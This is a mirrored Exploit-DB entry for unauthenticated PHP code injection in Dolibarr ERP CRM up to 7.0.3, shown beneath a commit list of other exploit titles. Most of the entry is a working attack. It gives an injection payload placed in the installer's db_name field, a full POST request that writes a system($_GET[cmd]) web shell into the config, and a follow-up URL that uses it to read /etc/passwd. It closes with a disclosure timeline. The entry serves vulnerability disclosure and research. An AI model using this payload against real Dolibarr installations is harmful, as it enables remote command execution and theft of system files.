bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44964.txt
Offensive Security e8a3702c6c DB: 2018-07-03 
11 changes to exploits/shellcodes

Core FTP LE 2.2 - Buffer Overflow (PoC)
SIPp 3.6 - Local Buffer Overflow (PoC)
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)

Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection
FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit)
Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)

Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)
Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit)
Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)
VMware NSX SD-WAN Edge < 3.1.2 - Command Injection
DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)
Dolibarr ERP CRM  < 7.0.3 - PHP Code Injection

Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)
2018-07-03 05:01:48 +00:00

32 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Unauthenticated Remote Code Evaluation in Dolibarr ERP CRM =<7.0.3
# Date: 06/29/2018
# Exploit Author: om3rcitak - https://omercitak.com
# Vendor Homepage: https://dolibarr.org
# Software Link: https://github.com/Dolibarr/dolibarr
# Version: =<7.0.3
# Tested on: Unix, Windows
## Technical Details
URL: http://{domain}/{dolibarr_path}/install/step1.php
Parameter Name: db_name
Parameter Type: POST
Attack Pattern: x\';system($_GET[cmd]);//
## Steps to reproduce the behavior
- Go to fresh install page.
- Click "Next Step" button for create example config file (conf/conf.php)
- Send this request:
```
POST {dolibarr_path}/install/step1.php HTTP/1.1
Host: {domain}
testpost=ok&action=set&main_dir=C%3A%2FAmpps%2Fwww&main_data_dir=C%3A%2FAmpps%2Fwww%2Fdocuments&main_url=http%3A%2F%2Flocalhost+&db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F&db_type=mysqli&db_host=localhost&db_port=3306&db_prefix=llx_&db_create_database=on&db_user=root&db_pass=root&db_create_user=on&db_user_root=root&db_pass_root=root&selectlang=auto
```
- Visit url and run the command: `http://{domain}/{dolibarr_path}/install/check.php?cmd=cat /etc/passwd`
## Timeline
- 06/29/2018 18:30 - Found vulnerability.
- 06/29/2018 18:44 - Report vendor.
- 06/29/2018 20:38 - Vulnerability fixed by vendor.
GitHub Issue: https://github.com/Dolibarr/dolibarr/issues/9032
Reference in a new issue View git blame Copy permalink